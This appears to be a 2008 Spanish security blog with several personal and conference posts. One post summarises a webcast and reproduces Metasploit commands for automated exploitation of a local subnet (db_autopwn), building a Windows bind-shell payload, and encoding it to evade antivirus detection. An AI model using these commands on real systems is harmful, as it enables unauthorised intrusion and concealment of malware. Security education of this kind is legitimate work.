miércoles, 26 de noviembre de 2008

2 años de kungfoosion

Increíblemente este blog cumple 2 años de vida, no solamente me sorprende el hecho de tener un blog sino de que haya durado tanto tiempo.


Tenía pensado poner estadísticas de visitas, lugares de procedencia, los posts mas leídos, pero en conclusión solamente quiero agradecer a todos aquellos que leen este blog y me incentivan a que continúe con la ardua tarea del blogger :P

Gracias!

domingo, 23 de noviembre de 2008

ekoparty en Diario Perfil

Hoy Domingo, se publicó en el Diario Perfil un articulo titulado "Argentina, vivero de hackers que hacen temblar la Internet".

En una cobertura de 3 páginas sobre "el mundo underground de los hackers", el tema central de todas las notas es la ekoparty.

Muchas de las fotos publicadas fueron tomadas de mi álbum, como la de Alfredo y Nicolás antes de dar su charla, Dave haciendo Lockpicking, una foto de los asistentes a mi training y hasta una mía entregándole un premio a Federico. También hay varios comentarios del hacker Francisco Amato :P



Fuente: Diario Perfil (las fotos solo aparecen en la versión impresa)

sábado, 22 de noviembre de 2008

CEH Training

Esta semana dicte el curso oficial de CEH "Certified Ethical Hacking" de Ec-Council, y quería saludar a Bibiana, Hernán, Augusto, Pablo P., Pablo M., Roberto y Martín, con los cuales pase una semana muy divertida a puro hacking "ético" ;-)

martes, 18 de noviembre de 2008

Debutando en Zárate

El Sábado pasado participe de la Merrel Adventure Race, una carrera de aventura nocturna por los descampados de Zárate.

Esta fue mi primer carrera de aventura y estuvo excelente! Lamentablemente no pude correr los 20km, participe en un grupo de postas con 3 integrantes. Hace poco tiempo comencé a entrenar con un grupo de atletismo llamado Trotadores Urbanos, y como todavía integro el subgrupo de "los nuevos", no me autorizan a correr grandes distancias.



Tengo el Blog un poco colgado, pero volveré con todo dentro de poco! ;-)

martes, 11 de noviembre de 2008

La Matrix Corre en Windows

¿ Que pasaría si la Matrix corriera sobre Windows ? Acá tenés la respuesta...





Fuente: CollegeHumor (enviado a la lista de la ekoparty por Andy Riancho)

martes, 4 de noviembre de 2008

San Ignacio de la Iglesia de Emacs

Richard Stallman realizó ayer una presentación en el congreso de la nación, en donde en estos momentos se encuentran discutiendo un proyecto de ley de uso de software libre para la administración pública nacional.

Los linuxeros están todos locos ?



Gracias a Sepa y Juanma por la noticia.

domingo, 2 de noviembre de 2008

Nuevos Vectores de Ataques

Paul Asadoorian de PaulDotCom presento un webcast sobre nuevos vectores de ataques llamado "Late-Breaking Computer Attack Vectors".

El webcast tuvo los siguiente tópicos:

* MS08-067 - Slimy Network Worms
* Automated Metasploit - “autopwning"
* Listen to your keystrokes, they are talking to you
* Bypassing anit-virus software
* FAIL Of The Month (FOTM) (Linksys WRT300n vulnerabilities)

Estas son algunas notas de lo mas interesante:

*** Metasploit Autopwn


msf > load db_sqlite3
msf > db_create mynetwork
msf > db_import_nmap_xml mynetwork.xml
- o también -
msf > db_nmap -sS -T4 -O 192.168.1.0/24
msf > db_autopwn -p -e


*** Listen to your keystrokes, they are talking to you

Este es un nuevo método para capturar las teclas tipeadas mediante las ondas electromagnéticas emitidas por los teclados.


En esta URL: lasecwww.epfl.ch/keyboard/ pueden encontrar unos videos demostrativos.


*** Bypassing Anti-Virus Software

Lo mas interesante de este webcast fueron algunos ejemplos sobre como evadir la detección de programas Anti-Virus.

En PASS #1 es creado un payload malicioso con Metasploit 3.2, que escaneado por VirusTotal.com, es detectado por 1 de 36 AVs.

En PASS #2 el archivo payload.exe de PASS #1, es encodeado con msfencode, y el archivo resultante es detectado por 4 de 36 AVs!!

En PASS #3 el archivo payload.exe de PASS #1, es encodeado con PE-Scrambler de Nick Harbour, y el archivo resultante es detectado por 1 de 36 AVs.

En todos los casos el único Anti-Virus que detecto todos los payloads fue el programa gratuito AVG.


PASS #1
./msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe

PASS #2
./msfencode x86/shikata_ga_nai -i payload.exe -t exe > sgn-payload.exe

PASS #3
c:\Tools>PEScrambler.exe -i payload.exe -o pepayload.exe


* Link al Webcast - Link a los Slides

LinkWithin